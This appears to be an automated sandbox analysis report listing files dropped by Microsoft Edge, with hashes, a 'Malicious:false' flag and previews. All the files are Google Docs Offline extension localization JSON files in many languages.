                                                                                                                                                                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):913
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):806
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):883
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                      MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                      SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                      SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                      SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):961
Entropy (8bit):4.537633413451255
Encrypted:false
SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:F61916A206AC0E971CDCB63B29E580E3
SHA1:994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):959
Entropy (8bit):4.570019855018913
Encrypted:false
SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:535331F8FB98894877811B14994FEA9D
SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):968
Entropy (8bit):4.633956349931516
Encrypted:false
SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:64204786E7A7C1ED9C241F1C59B81007
SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:false
Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):838
Entropy (8bit):4.4975520913636595
Encrypted:false
SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:29A1DA4ACB4C9D04F080BB101E204E93
SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:false
Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1305
Entropy (8bit):4.673517697192589
Encrypted:false
SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:false
Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):911
Entropy (8bit):4.6294343834070935
Encrypted:false
SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:false
Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):939
Entropy (8bit):4.451724169062555
Encrypted:false
SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:FCEA43D62605860FFF41BE26BAD80169
SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:false
Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                      MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                      SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                      SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                      SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
